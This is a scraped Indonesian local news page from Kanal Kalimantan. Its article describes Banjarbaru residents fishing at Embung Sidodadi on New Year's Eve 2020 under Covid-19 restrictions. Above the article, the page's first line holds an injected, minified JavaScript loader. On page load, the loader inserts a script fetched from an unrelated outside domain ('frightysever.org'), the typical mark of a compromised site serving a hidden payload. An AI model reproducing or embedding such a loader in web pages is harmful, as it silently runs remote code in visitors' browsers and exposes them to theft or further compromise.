(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Kota Banjarbaru

Menikmati Momen Pergantian Tahun Sembari Mancing di Embung Sidodadi Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Perayaan tahun baru di Kota Banjarbaru dipastikan tak seramai sebelumnya. Maklumat yang dikeluarkan pemerintah ihwal pembatasan kegiatan masyarakat dalam mengantisipasi penyebaran Covid-19 secara meluas, wajib dipatuhi.

Tidak ada pesta kembang api dan tidak ada pula acara meriah pada Kamis (31/12/2020) ini. Seluruh aktivitas di area publik cafe, tempat hiburan dan tempat wisata harus dihentikan pada pukul 18.00 Wita, sesuai dengan isi maklumat yang telah dicetuskan.

Namun dengan tegasnya aturan itu, masyarakat Banjarbaru nyatanya masih bisa menikmati momen libur peringatan tahun baru dengan cara yang berbeda. Seperti halnya, mereka yang hobi memancing.

Di Banjarbaru, aktivitas memancing dilakukan sejumlah kalangan masyarakat di Embung Sidodadi, Jalan Sidodadi II RW 06, Kelurahan Banjarbaru Selatan, Kecamatan Banjarbaru Selatan. Jarang tersorot, lokasi ini rupanya cukup sering dikunjungi.

Agus (31) warga Kelurahan Guntung Manggis, mengaku tak memiliki rencana apapun dalam merayakan tahun baru, mengingat masih dalam kondisi pandemi Covid-19. Baginya, hari libur peringatan tahun baru adalah kesempatan untuk menjernihkan pikiran dari padatnya aktivitas di kantor.

“Ya dengan memancing. Tidak berkerumun dan kalau hari sudah mulai gelapz tinggal pulang ke rumah. Sampai rumah ya menikmati waktu sama istri dan anak. Saya baru kali ini memancing di sini, itu juga disarankan sama teman kantor. Tempatnya bagus walaupun jarang terekspose,” ceritanya.

Senada, Nahdi (23) salah satu mahasiswa di Universitas Lambung Mangkurat, menyebut bahwa memancing adalah hobi barunya. Ditiadakannya aktivitas belajar mengajar di kampus, membuat dirinya harus mencari hobi baru.

“Semenjak merebaknya wabah, saya mulai jadi hobi memancing. Tapi memancingnya di lokasi yang agak sepi. Nah, di Embung Sidodadi ini tidak terlalu banyak orang. Jadi saya bisa menikmati waktu sendirian,” katanya.

Aktivitas memancing di Embung Sidodadi mungkin bisa dijadikan salah satu alternatif kamu dalam menikmati libur pergantian tahun di Banjarbaru. Tentu masih banyak lagi aktivitas lainnya yang bisa dilakukan, dengan syarat menghindari kerumunan masyarkat. (Kanalkalimantan.com/rico)

 

Reporter : Rico
Editor : Cell

Al Ghifari

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

10 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

11 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

11 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

11 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

11 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

12 jam ago

This website uses cookies.